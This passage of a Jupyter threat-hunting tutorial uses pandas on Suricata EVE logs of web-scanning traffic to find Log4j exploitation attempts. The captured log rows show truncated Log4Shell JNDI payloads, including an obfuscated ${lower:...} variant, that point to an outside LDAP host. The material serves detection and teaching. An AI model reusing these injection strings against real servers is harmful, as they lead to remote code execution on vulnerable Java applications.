,timestamp,flow_id,pcap_cnt,event_type,src_ip,src_port,dest_ip,dest_port,proto,pkt_src,...,alert.metadata.deployment,alert.metadata.signature_severity,app_proto_ts,metadata.flowints.http.anomaly.count,files,snmp.usm,tcp.ecn,tcp.cwr,metadata.flowints.tcp.retransmission.count,metadata.flowbits
0,2022-01-01T00:05:51.487413+0000,2.093424e+15,50.0,sip,193.46.255.60,5103.0,198.71.247.91,5060.0,UDP,wire/pcap,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
1,2022-01-01T00:48:30.704116+0000,1.898256e+15,418.0,sip,165.227.105.220,5073.0,198.71.247.91,5060.0,UDP,wire/pcap,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
2,2022-01-01T00:00:13.076985+0000,7.894928e+14,NaN,flow,34.207.117.173,NaN,198.71.247.91,NaN,ICMP,NaN,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
3,2022-01-01T00:00:13.076985+0000,5.891015e+13,NaN,flow,52.87.198.117,NaN,198.71.247.91,NaN,ICMP,NaN,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
4,2022-01-01T00:01:49.092097+0000,1.521457e+15,18.0,dns,209.141.58.15,35550.0,198.71.247.91,53.0,UDP,wire/pcap,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...
25881,2022-01-01T00:00:13.076985+0000,9.586926e+14,NaN,flow,2.56.57.136,49464.0,198.71.247.91,3846.0,TCP,NaN,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
25882,2022-01-01T00:00:13.076985+0000,1.031022e+14,NaN,flow,104.167.223.204,6075.0,198.71.247.91,5080.0,UDP,NaN,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
25883,2022-01-01T00:00:13.076985+0000,2.259705e+13,NaN,flow,34.86.35.2,62892.0,198.71.247.91,5900.0,TCP,NaN,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
25884,2022-01-01T00:00:13.076985+0000,1.992429e+15,NaN,flow,45.134.26.235,58276.0,198.71.247.91,12343.0,TCP,NaN,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN


#### Describe method

A `describe` method is a useful shortcut for understanding statistical properties of numeric columns. It has limited value for NSM data, as most fields are either textual or categorical. Some numerical EVE values can not be analyzed like this, for example source and destination ports, randomly generated flow ID values, etc. However, it can provide great insights into `flow` and `stats` records, instantly revealing data properties such as distribution, max and min values, mean values, standard deviation, etc.

In [36]:
DF.describe()

,flow_id,pcap_cnt,src_port,dest_port,icmp_type,icmp_code,response_icmp_type,response_icmp_code,flow.pkts_toserver,flow.pkts_toclient,...,stats.app_layer.error.nfs_udp.internal,stats.app_layer.error.krb5_udp.alloc,stats.app_layer.error.krb5_udp.parser,stats.app_layer.error.krb5_udp.internal,stats.app_layer.expectations,stats.http.memuse,stats.http.memcap,stats.ftp.memuse,stats.ftp.memcap,stats.file_store.open_files
count,2.588500e+04,2754.000000,23521.000000,23521.000000,2366.000000,2366.0,2364.0,2364.0,23242.000000,23242.000000,...,1.0,1.0,1.0,1.0,1.0,1.0,1.0,1.0,1.0,1.0
mean,1.136792e+15,21674.655410,42142.121721,14495.628290,7.996619,0.0,0.0,0.0,1.315506,0.392393,...,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0
std,6.468396e+14,12305.718714,17973.734417,17814.277493,0.164468,0.0,0.0,0.0,1.842111,1.576272,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
min,1.713263e+09,18.000000,0.000000,0.000000,0.000000,0.0,0.0,0.0,1.000000,0.000000,...,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0
25%,5.881089e+14,10651.000000,36098.000000,1679.000000,8.000000,0.0,0.0,0.0,1.000000,0.000000,...,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0
50%,1.130978e+15,23268.000000,48856.000000,7000.000000,8.000000,0.0,0.0,0.0,1.000000,0.000000,...,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0
75%,1.695233e+15,33511.000000,54810.000000,22005.000000,8.000000,0.0,0.0,0.0,1.000000,0.000000,...,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0
max,2.251782e+15,39193.000000,65531.000000,65528.000000,8.000000,0.0,0.0,0.0,134.000000,91.000000,...,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0


## Data exploration and threat hunting - Log4j scanning

Prior section focused on the basics of Jupyter, pandas, and Suricata EVE JSON. Now is time to cover a basic data exploration use-case. Some data science specific considerations will be explained, mostly to provide context to quirks when working with Pandas. We will not get into datamining or machine learning quite yet. Code examples assume that [MTA web scanning PCAP](https://malware-traffic-analysis.net/2022/01/03/2022-01-01-thru-03-server-activity-with-log4j-attempts.pcap.zip) has been downloaded, unpacked, and parsed with Suricata.

### On threat hunting

I'm no stranger to teaching classroom courses, but one topic I always struggle to cover is threat hunting. Why? Because it is not a linear process, each hunting case can be vastly different, and each requires specialized knowledge. In other words, it's detective work where one always needs to consider new evidence. And picking up the right clues often comes down to *gut feeling*.

Thus, if hunting requires case-by-case lessons, then let's start with the first one. We will explore web scanning dataset with the goal of revealing a high-profile Java exploit. For that purpose we need to:
* prepare the raw data;
* understand basic web request logic;
* understand how scanners work;
* find the entry point to data exploration;
* subset the NSM logs and pivot to correct records;
* apply transformations to extract the exploit;
* report it and consider how to make the process easier in the future;

### Data preparation

Firstly comes data preparation. This might sound like a small step, but is actually by far the most important. Data scientist can easily spend 80-90 per cent of working time here, and I believe that estimation to be accurate also for security analysts. After all, a organization should always be improving detection capabilities whenever not actively handling a ongoing incident, and that can technically be classified as data preparation. Even organizations that are constantly handling incident response cases, such as those that provide managed cyber security service to other companies, likely have dedicated staff for data and detection engineering. Indeed, even we in Stamus Networks spend most of our working days on data preparation, as we build and support a product that will be operated by our customers.

But what is data preparation? In practice, any operation that transforms or enriches existing data can be considered data preparation. But in data science, it refers to a collection of methods and techniques for collecting data, dealing with missing values, combining, restructuring, and in general *preparing* it for whatever algorithm the analyst wishes to apply. Of course, should that algorithm not produce meaningful result, then analyst would likely need to choose another and apply different preparation techniques as a result. Hence why researchers spend so much time here. 

By comparison, threat hunter would follow a trail in data, only for it to reveal another trail. Sometimes the trail leads to information that does not exist, but can be derived from existing data. This is called pivoting. Experienced hunters know it to be normal part of the process, and best we can really do is prepare data to the best of our knowledge, accepting that eventually we always need to fall back to external analysis. Important thing is to try and ensure that next time we don't have to do the same work.

This post will try and present one of those hunting cases while explaining techniques we apply from both disciplines. Consider the following dataframe, does something seem wrong?

In [37]:
DF.head()

,timestamp,flow_id,pcap_cnt,event_type,src_ip,src_port,dest_ip,dest_port,proto,pkt_src,...,stats.app_layer.error.nfs_udp.internal,stats.app_layer.error.krb5_udp.alloc,stats.app_layer.error.krb5_udp.parser,stats.app_layer.error.krb5_udp.internal,stats.app_layer.expectations,stats.http.memuse,stats.http.memcap,stats.ftp.memuse,stats.ftp.memcap,stats.file_store.open_files
0,2022-01-01T00:05:51.487413+0000,2.093424e+15,50.0,sip,193.46.255.60,5103.0,198.71.247.91,5060.0,UDP,wire/pcap,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
1,2022-01-01T00:48:30.704116+0000,1.898256e+15,418.0,sip,165.227.105.220,5073.0,198.71.247.91,5060.0,UDP,wire/pcap,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
2,2022-01-01T00:00:13.076985+0000,7.894928e+14,NaN,flow,34.207.117.173,NaN,198.71.247.91,NaN,ICMP,NaN,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
3,2022-01-01T00:00:13.076985+0000,5.891015e+13,NaN,flow,52.87.198.117,NaN,198.71.247.91,NaN,ICMP,NaN,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
4,2022-01-01T00:01:49.092097+0000,1.521457e+15,18.0,dns,209.141.58.15,35550.0,198.71.247.91,53.0,UDP,wire/pcap,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN


Firstly, `flow_id` is formatted in scientific notation. In fact, pandas has converted this value into a floating point type, whereas anyone familiar with EVE JSON knows it's actually supposed to be a large randomly generated integer. This poses a big problem for flow correlation, as events generated for same flow will have identical `flow_id` to time them together. We need to be able to look up individual `flow_id` values, meaning we need to be able to copy them from the display. Quite difficult with a floating point number formatted in power of ten.

To fix that, we will simply apply a conversion over entire dataframe column, then replace the original column with transformed values. Note that columns can be selected both with method or dictionary notation. In other words `df.flow_id` and `df["flow_id"]` are both valid. It's mostly a matter of preference, as method notation is cleaner and is mostly supported by IDE autocompletion. However, dictionary notation is needed in dynamic code, for example when looping over a dynamically generated list of columns. Method notation can also collide with built-in method or dataframe object parameter, so keep that in mind as well.

All we need to do here is use `.astype` method to convert entire column of data into another type. If any single item fails, though, the entire conversion breaks. And indeed it will on this dataset, as full dataframe also contains Suricata `stats` events that lack `flow_id` key. A missing value can simply be omitted from JSON, but must be somehow represented in a vector. By default, pandas uses `NaN`, or *not a number* value. We have already established that `NaN` value is actually a special floating point and not a `null` or `None`. Problem is, other types have nothing equivalent, so `astype` conversion simply breaks. Here the workaround is trivial - we simply replace missing values with a zero, using `fillna` method. I call it *workaround* and not *solution* since replacing missing statistical measurements with zero values might not actually be a good idea. But here it's fine, as `flow_id` is not a measurement.

In [38]:
DF["flow_id"] = (
    DF
    .flow_id
    .fillna(0)
    .astype(int)
)

Similar conversions can be applied to other fields, such as source and destination ports. Likewise, they are not numerical measurements like bytes or packets tracked in flow statistics. Instead, it's *categorical* data, meaning they correspond to finite number of categories. Port numbers have possible values between `1` and `65535`, with low ports being assigned for services and high ports are dynamically used by clients connecting to them. For example, port `22` is used by SSH, port `53` is used by DNS, `80` is standard for unencrypted HTTP, `443` for encrypted HTTPS, etc. Calculating floating point statistics on those numbers would be pointless. But we can deduce useful information from the categories. A HTTP TLS connection to port other than 443 can be suspicious. Attackers might also try to exfiltrate data over port 53, as it's required for functional DNS and therefore not filtered by most organizations. Note that Suricata does not depend on port numbers for protocol detection. That's handled by application level parser. But, if Suricata parses any application level protocol on a well known port other than what it's actually assigned to, then it can safely be escalated as declaration of compromise. Like any non-DNS traffic on port 53. Analyst might also be interested in grouping traffic based on port ranges. For example, flow where both sides of the connection use high ephemeral ports can be considered suspicious or policy violations.

In [39]:
for col in ["src_port", "dest_port", "pcap_cnt"]:
    DF[col] = (
        DF[col]
        .fillna(0)
        .astype(int)
    )

We can also apply type conversions. For example, `timestamp` field is currently considered simply a text. But we can convert it into timestamp object instead, which would enable better filtering and data aggregation.

In [40]:
DF["timestamp"] = pd.to_datetime(DF["timestamp"])

Result is somewhat cleaner representation of the data. Notice how flow ID values and port numbers are easier to read. There's also a subtle change in timestamp formatting, though that is not actually important. What matters is internal representation.

In [41]:
DF

,timestamp,flow_id,pcap_cnt,event_type,src_ip,src_port,dest_ip,dest_port,proto,pkt_src,...,stats.app_layer.error.nfs_udp.internal,stats.app_layer.error.krb5_udp.alloc,stats.app_layer.error.krb5_udp.parser,stats.app_layer.error.krb5_udp.internal,stats.app_layer.expectations,stats.http.memuse,stats.http.memcap,stats.ftp.memuse,stats.ftp.memcap,stats.file_store.open_files
0,2022-01-01 00:05:51.487413+00:00,2093424266960911,50,sip,193.46.255.60,5103,198.71.247.91,5060,UDP,wire/pcap,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
1,2022-01-01 00:48:30.704116+00:00,1898255609358293,418,sip,165.227.105.220,5073,198.71.247.91,5060,UDP,wire/pcap,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
2,2022-01-01 00:00:13.076985+00:00,789492778247146,0,flow,34.207.117.173,0,198.71.247.91,0,ICMP,NaN,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
3,2022-01-01 00:00:13.076985+00:00,58910149402402,0,flow,52.87.198.117,0,198.71.247.91,0,ICMP,NaN,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
4,2022-01-01 00:01:49.092097+00:00,1521456587017729,18,dns,209.141.58.15,35550,198.71.247.91,53,UDP,wire/pcap,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...
25881,2022-01-01 00:00:13.076985+00:00,958692562960358,0,flow,2.56.57.136,49464,198.71.247.91,3846,TCP,NaN,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
25882,2022-01-01 00:00:13.076985+00:00,103102181343216,0,flow,104.167.223.204,6075,198.71.247.91,5080,UDP,NaN,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
25883,2022-01-01 00:00:13.076985+00:00,22597052268532,0,flow,34.86.35.2,62892,198.71.247.91,5900,TCP,NaN,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
25884,2022-01-01 00:00:13.076985+00:00,1992429485359101,0,flow,45.134.26.235,58276,198.71.247.91,12343,TCP,NaN,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN


A lot more could be done to clean up and improve the data. In due time.

### Locate and subset

Full dataframe has 25905 rows. That's too much and we need to start somewhere. Suricata started as IDS project and alerting is still very much its main use-case. So, let's start there. But make no mistake, alerts are simply a starting point and rarely tell the whole data. They are simply a convenient entry point into the NSM data through a technique called *flow ID correlation*.

We can easily subset a dataframe by rows or columns. Column selection is easy - simply pass a list of columns using python indexing notation. But row filtering requires more work. We need to create a *index Series* that can be passed into pandas `loc` method. Simply put, a pandas `Series` is a object that holds vector of data and indexing values for each item in that vector. Dataframe is basically a collection of *series* objects, with each corresponding to a column.

Applying comparison operations on a dataframe column results in a new pandas series of truth values. `True` means row matches the filter, `False` means it does not.

In [42]:
DF.event_type == "alert"

0        False
1        False
2        False
3        False
4        False
         ...  
25881    False
25882    False
25883    False
25884    False
25885    False
Name: event_type, Length: 25886, dtype: bool

Passing this index series to `loc` method selects relevant rows. These index selections can also be combined with multiple `loc` calls, with each call adding a extra set of filter. Once filtered, we sort the values by timestamp to ensure that alerts are chronological. Latest events could be shown first by setting parameter `ascending=False`.

Also, we are only interested in columns that contain actual data. Alert event might not have full context, as Suricata emits this event as soon as possible. Other event types such as `http`, `smb`, or `flow` arrive later. Flow event might not be flushed until flow timeout, which by default is 10 minutes for TCP connections. In other words, flow records might arrive full 10 minutes after initial alert, or even later with higher timeout configuration. Alert records might hold data from flow, but it's incomplete. Flow `end` timestamp would be missing, for example, and would manifest as `NaN` value in the dataframe. In fact, if the dataframe is comprised only of alerts, then all `flow.end` values would be `NaN`. Why is that a problem? Since our subset dataframe would show all columns available in the original, yet most are just empty values. And display cannot fit all, so the view is truncated. Explicitly selecting columns with data would be tedious as we'd need to view each one to verify each, assuming the analyst is totally unfamiliar with the columns. Luckily we can use `drapna` method to remove columns where all values are `NaN` values. Thus, pandas pandas already does a lot of initial exploration for us.

In [43]:
DF_ALERT = (
    DF
    .loc[DF.event_type == "alert"]
    .loc[DF["alert.category"] != "Generic Protocol Command Decode"]
    .sort_values(by=["timestamp"], ascending=True)
    .dropna(how="all", axis=1)
)

In [44]:
print("dataframe has %d rows and %d columns" % DF_ALERT.shape)

dataframe has 47 rows and 48 columns


Filtered indices can also be stored as variables and joined in a single `loc` statement. Following code is functionally identical to previous example.

In [45]:
idx_alert = DF.event_type == "alert"
idx_generic_protocol_decode = DF["alert.category"] == "Generic Protocol Command Decode"

In [46]:
DF_ALERT = (
    DF
    .loc[idx_alert & ~idx_generic_protocol_decode]
    .sort_values(by=["timestamp"], ascending=True)
    .dropna(how="all", axis=1)
)

In [47]:
print("dataframe has %d rows and %d columns" % DF_ALERT.shape)

dataframe has 47 rows and 48 columns


In [48]:
DF_ALERT.head()

,timestamp,flow_id,pcap_cnt,event_type,src_ip,src_port,dest_ip,dest_port,proto,pkt_src,...,http.http_port,http.http_refer,alert.metadata.created_at,alert.metadata.updated_at,alert.metadata.former_category,alert.metadata.affected_product,alert.metadata.attack_target,alert.metadata.deployment,alert.metadata.signature_severity,files
6022,2022-01-01 00:00:13.076985+00:00,1231851594736315,0,alert,222.245.36.158,8557,198.71.247.91,80,TCP,stream (flow timeout),...,80.0,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,"[{'filename': '/HNAP1/', 'gaps': False, 'state..."
6009,2022-01-01 00:00:13.076985+00:00,747504737730237,0,alert,125.46.164.81,35634,198.71.247.91,80,TCP,stream (flow timeout),...,80.0,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,"[{'filename': '/HNAP1/', 'gaps': False, 'state..."
876,2022-01-01 03:33:31.436823+00:00,1031718539041562,2195,alert,45.137.23.231,58032,198.71.247.91,123,UDP,wire/pcap,...,NaN,NaN,[2014_01_03],[2014_01_03],NaN,NaN,NaN,NaN,NaN,NaN
239,2022-01-01 05:00:57.663056+00:00,314530202311547,2900,alert,185.107.81.47,33810,198.71.247.91,123,UDP,wire/pcap,...,NaN,NaN,[2014_01_03],[2014_01_03],NaN,NaN,NaN,NaN,NaN,NaN
245,2022-01-01 06:15:44.677931+00:00,2223480555070172,3525,alert,45.137.23.232,34716,198.71.247.91,80,TCP,wire/pcap,...,NaN,NaN,[2019_11_26],[2020_10_23],[SCAN],NaN,NaN,NaN,NaN,NaN


Resulting dataframe still has 48 columns to explore. Reader might observe that some columns in the middle are even omitted. While we could override this behavior, the result would still be quite difficult to grasp visually. Better method would be to limit the column scope. In other words, select a small set of columns for initial exploration. Selecting following columns provides a fairly concise representation of alerts.

* `timestamp`
* `flow_id`
* `flow.src_ip`
* `flow.dest_ip`
* `alert.signature`
* `alert.category`

We have already discussed `timestamp` and `flow_id`. Former is pretty intuitive, latter will be needed as a pivot point to more data. For alerts, I usually start with simply `alert.signature` when doing initial exploration. It is the description of the signature defined in rule `msg` option. `alert.category` is useful for additional context and contains the general categorization, such as network trojan, denial or service, network scan, policy violation, etc.

Instead of `src_ip` and `dest_ip`, I have opted to display `flow.src_ip` and `flow.dest_ip`. Those are new fields added in Suricata 7 and are mainly relevant for analyzing `alert` event types. Why? Because signature can trigger in any direction. EVE NSM logs follows the direction of the flow. Client endpoint is `src_ip` and server is `dest_ip`. Alerts work differently. A rule could be written for either request or response traffic. For example, HTTP GET is part of HTTP request, wheres HTTP status code is part of response. Suricata rule parser does not even allow mixing those keywords in the same rule. A rule matching on the HTTP method would report client as `src_ip`, as expected. But rule written to match on HTTP status code would mark source of the one-sided response flow as the `src_ip`, which would actually reverse the IP pair since the source is server responding to request.

This has caused a lot of confusion for the analysts, as one always needs to translate what actually happened. Indeed, this is a big contributor to *alert fatigue* that our product in Stamus Networks is attempting to alleviate. Luckily, `flow.src_ip` and `flow.dest_ip` maintain the real source information from two-sided flow. Simply put, source and destination IP values are not flipped depending on the signature.

In [49]:
DF_ALERT[["timestamp", "flow_id", "flow.src_ip", "flow.dest_ip", "alert.signature", "alert.category"]]

,timestamp,flow_id,flow.src_ip,flow.dest_ip,alert.signature,alert.category
6022,2022-01-01 00:00:13.076985+00:00,1231851594736315,222.245.36.158,198.71.247.91,TGI HUNT Graves Accent (backtick) in HTTP Header,Potentially Bad Traffic
6009,2022-01-01 00:00:13.076985+00:00,747504737730237,125.46.164.81,198.71.247.91,TGI HUNT Graves Accent (backtick) in HTTP Header,Potentially Bad Traffic
876,2022-01-01 03:33:31.436823+00:00,1031718539041562,45.137.23.231,198.71.247.91,ET DOS Possible NTP DDoS Inbound Frequent Un-A...,Attempted Denial of Service
239,2022-01-01 05:00:57.663056+00:00,314530202311547,185.107.81.47,198.71.247.91,ET DOS Possible NTP DDoS Inbound Frequent Un-A...,Attempted Denial of Service
245,2022-01-01 06:15:44.677931+00:00,2223480555070172,45.137.23.232,198.71.247.91,ET SCAN Zmap User-Agent (Inbound),Detection of a Network Scan
386,2022-01-01 08:40:00.662376+00:00,30134407562075,51.15.2.174,198.71.247.91,ET DOS Possible NTP DDoS Inbound Frequent Un-A...,Attempted Denial of Service
419,2022-01-01 09:22:24.166014+00:00,238601697559589,192.241.211.166,198.71.247.91,ET SCAN Zmap User-Agent (Inbound),Detection of a Network Scan
686,2022-01-01 12:56:02.652588+00:00,832519861138466,45.137.23.231,198.71.247.91,ET DOS Possible NTP DDoS Inbound Frequent Un-A...,Attempted Denial of Service
793,2022-01-01 16:54:07.123118+00:00,2217639527244356,45.137.23.231,198.71.247.91,ET DOS Possible NTP DDoS Inbound Frequent Un-A...,Attempted Denial of Service
1055,2022-01-01 17:26:48.150013+00:00,182253758207215,192.241.211.149,198.71.247.91,ET SCAN Zmap User-Agent (Inbound),Detection of a Network Scan


### Pivot

For this exercise, let's drill into [Log4j](https://logging.apache.org/log4j/2.x/) alerts. Why? All of the alerts within the set indicate scanning activity and are easily triggered by exploitation attempts. Emphasis on *attempt*. Usually that does not mean that target was compromised. Furthermore, a public service gets scanned all the time. Every few minutes for a small service. Larger ones might see more action than that! Anyone who has monitored public services is aware of this, and alerts like this mostly go ignored. These alerts are *not* false positives. They are simply boring. But not useless.

Normally, the scanners are disposable botnet nodes - compromised computers, proxy servers in the cloud, traffic originating from TOR nodes, etc. Not much interesting data we can extract there without the help of ISPs and police. Log4j exploits are slightly different, however. A lot has been published on this particular CVE, including in prior blog posts by Stamus Networks. So I will only present a quick recap.

Log4j is the standard logging library used in Java applications. That library is generally for writing entries into log files, but also supported evaluating commands. A malicious actor could trigger a log entry with special `jndi:` content, that would cause the logging library to evaluate it as system command. This is known as RCE, or Remote Command Injection, allowing remote user to essentially execute commands on remote system. Vulnerability was quickly dubbed *Log4shell*. Since interacting with a remote application entirely via requests triggering log entries is a bit of a hassle, the typical use-case would be to inject a small payload that would connect to remote infrastructure or download malicious payloads. Essentially working as stage 1 downloader or initialization if command and control communication.

Would be interesting to extract this payload and see what is being injected. Perhaps even reveal malicious c2 infrastructure behind it! These are the alerts we are investigating.

In [50]:
import re

In [51]:
(
    DF_ALERT[["timestamp", "flow_id", "flow.src_ip", "flow.dest_ip", "alert.signature", "alert.category"]]
    .loc[DF_ALERT["alert.signature"].str.contains("log4j", flags=re.IGNORECASE)]
)

,timestamp,flow_id,flow.src_ip,flow.dest_ip,alert.signature,alert.category
1723,2022-01-01 19:55:04.810648+00:00,42135186956994,195.54.160.149,198.71.247.91,TGI HUNT log4j with Base64,Potentially Bad Traffic
3222,2022-01-02 17:00:02.205062+00:00,518356397128850,195.54.160.149,198.71.247.91,TGI HUNT log4j with Base64,Potentially Bad Traffic


Firstly, having selected initial alerts, we want to see all corresponding alerts. During Suricon presentation, I showed Jupyter `input()` method, which allows user to manually enter a value and store it as variable. One could do something like this:

```
FLOW_ID = input()
```

While Suricata `flow_id` values are consistent within events that belong to the same flow, the value is not based on anything. Unlike `community_id`, which is a hash value generated from the flow 5-tuple (protocol, IP pair and port pairs), the `flow_id` is just a random integer that's assigned to a entry in flow table. In other words, parsing the same PCAP multiple times would result in different `flow_id` values every time, even if actual events remain the same.

This is a problem for a notebook that aims to be repeatable, as execution would halt and notebook would expect input from the user. But with some code we can still get around the problem and create a fully repeatable notebook. All we need to do is extract unique `flow_id` values and store them in a variable.

In [52]:
FLOW_ID = (
    DF_ALERT
    .loc[DF_ALERT["alert.signature"].str.contains("log4j", flags=re.IGNORECASE)]
    .flow_id
    .unique()
)
FLOW_ID

array([ 42135186956994, 518356397128850])

Once prepared, we can use `isin` method on a pandas *Series* object to filter on multiple values. We can also sort the rows based on multiple columns. We want entries within same flow to be grouped together, but also have consistent ordering of event types.

In [53]:
DF_LOG4J = (
    DF
    .loc[DF.flow_id.isin(FLOW_ID)]
    .dropna(how="all", axis=1)
    .sort_values(by=["flow_id", "event_type"])
)
DF_LOG4J

,timestamp,flow_id,pcap_cnt,event_type,src_ip,src_port,dest_ip,dest_port,proto,pkt_src,...,fileinfo.gaps,fileinfo.state,fileinfo.stored,fileinfo.size,fileinfo.tx_id,http.http_port,http.http_refer,tcp.fin,tcp.psh,tcp.ack
1723,2022-01-01 19:55:04.810648+00:00,42135186956994,10781,alert,195.54.160.149,57842,198.71.247.91,80,TCP,wire/pcap,...,NaN,NaN,NaN,NaN,NaN,80.0,${jndi:${lower:l}${lower:d}${lower:a}${lower:p...,NaN,NaN,NaN
1732,2022-01-01 19:55:04.810649+00:00,42135186956994,10783,fileinfo,198.71.247.91,80,195.54.160.149,57842,TCP,wire/pcap,...,False,CLOSED,False,51.0,0.0,80.0,${jndi:${lower:l}${lower:d}${lower:a}${lower:p...,NaN,NaN,NaN
6071,2022-01-01 00:00:13.076985+00:00,42135186956994,0,flow,195.54.160.149,57842,198.71.247.91,80,TCP,NaN,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,True,True,True
1724,2022-01-01 19:55:04.810648+00:00,42135186956994,10781,http,195.54.160.149,57842,198.71.247.91,80,TCP,wire/pcap,...,NaN,NaN,NaN,NaN,NaN,80.0,${jndi:${lower:l}${lower:d}${lower:a}${lower:p...,NaN,NaN,NaN
3222,2022-01-02 17:00:02.205062+00:00,518356397128850,22931,alert,195.54.160.149,39020,198.71.247.91,80,TCP,wire/pcap,...,NaN,NaN,NaN,NaN,NaN,80.0,${jndi:${lower:l}${lower:d}${lower:a}${lower:p...,NaN,NaN,NaN
3232,2022-01-02 17:00:02.205132+00:00,518356397128850,22933,fileinfo,198.71.247.91,80,195.54.160.149,39020,TCP,wire/pcap,...,False,CLOSED,False,51.0,0.0,80.0,${jndi:${lower:l}${lower:d}${lower:a}${lower:p...,NaN,NaN,NaN
25618,2022-01-01 00:00:13.076985+00:00,518356397128850,0,flow,195.54.160.149,39020,198.71.247.91,80,TCP,NaN,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,True,True,True
3228,2022-01-02 17:00:02.205062+00:00,518356397128850,22931,http,195.54.160.149,39020,198.71.247.91,80,TCP,wire/pcap,...,NaN,NaN,NaN,NaN,NaN,80.0,${jndi:${lower:l}${lower:d}${lower:a}${lower:p...,NaN,NaN,NaN


One might already notice strange values in HTTP columns, but the dataframe printout is still too large to visually explore. Next step would be to understand data columns that we can explore. Remember, `dropna` method used when creating `DF_LOG4J` ensures that each column actually has some data to explore. Those columns can be extracted from the dataframe. A nice trick is also to pass this column array into a pandas dataframe to leverage nice Jupyter display.

In [54]:
pd.DataFrame(DF_LOG4J.columns.values)

,0
0,timestamp
1,flow_id
2,pcap_cnt
3,event_type
4,src_ip
5,src_port
6,dest_ip
7,dest_port
8,proto
9,pkt_src


In addition to columns we explored before, the following fields can reveal useful information:
* `http.hostname` is the web service that was accessed. Usually it should be a domain name, but here we observe raw IP instead. This automatically indicates automation.
* `http.url` is the website path following hostname. Here we observe that instead of a typical website path, such as `index.html`, it instantly tries to inject a LDAP query via previously mentioned `jndi` prefix.
* `fileinfo.filename` corresponds to any file that gets downloaded. Keep in mind, that HTML web page is also a file and is reflected in fileinfo logs. Here we observe that bot is not really trying to access anything specific and is only focused on RCE injection.
* `http.http_refer` should be used when another service has done the request. However, like many HTTP fields, this is simply a field that browser controls. Malicious requests can can inject arbitrary values here, and here it serves as secondary injection point. One can observe how it seems to attempt to bypass ldap query sanitation by evaluating lowercase letters.

In [55]:
COLUMNS = ["flow_id", "src_ip", "dest_ip", "event_type", "http.hostname", "http.url", "fileinfo.filename", "http.http_refer"]
DF_LOG4J[COLUMNS]

,flow_id,src_ip,dest_ip,event_type,http.hostname,http.url,fileinfo.filename,http.http_refer
1723,42135186956994,195.54.160.149,198.71.247.91,alert,198.71.247.91,/?x=${jndi:ldap://195.54.160.149:12344/Basic/C...,NaN,${jndi:${lower:l}${lower:d}${lower:a}${lower:p...
1732,42135186956994,198.71.247.91,195.54.160.149,fileinfo,198.71.247.91,/?x=${jndi:ldap://195.54.160.149:12344/Basic/C...,/,${jndi:${lower:l}${lower:d}${lower:a}${lower:p...
6071,42135186956994,195.54.160.149,198.71.247.91,flow,NaN,NaN,NaN,NaN
1724,42135186956994,195.54.160.149,198.71.247.91,http,198.71.247.91,/?x=${jndi:ldap://195.54.160.149:12344/Basic/C...,NaN,${jndi:${lower:l}${lower:d}${lower:a}${lower:p...
3222,518356397128850,195.54.160.149,198.71.247.91,alert,198.71.247.91,/?x=${jndi:ldap://195.54.160.149:12344/Basic/C...,NaN,${jndi:${lower:l}${lower:d}${lower:a}${lower:p...
3232,518356397128850,198.71.247.91,195.54.160.149,fileinfo,198.71.247.91,/?x=${jndi:ldap://195.54.160.149:12344/Basic/C...,/,${jndi:${lower:l}${lower:d}${lower:a}${lower:p...
25618,518356397128850,195.54.160.149,198.71.247.91,flow,NaN,NaN,NaN,NaN
3228,518356397128850,195.54.160.149,198.71.247.91,http,198.71.247.91,/?x=${jndi:ldap://195.54.160.149:12344/Basic/C...,NaN,${jndi:${lower:l}${lower:d}${lower:a}${lower:p...


On closer inspection, we notice that both connections attempt to execute the same exploitation script.

In [56]:
(
    DF_LOG4J["http.url"]
    .dropna()
    .unique()
)

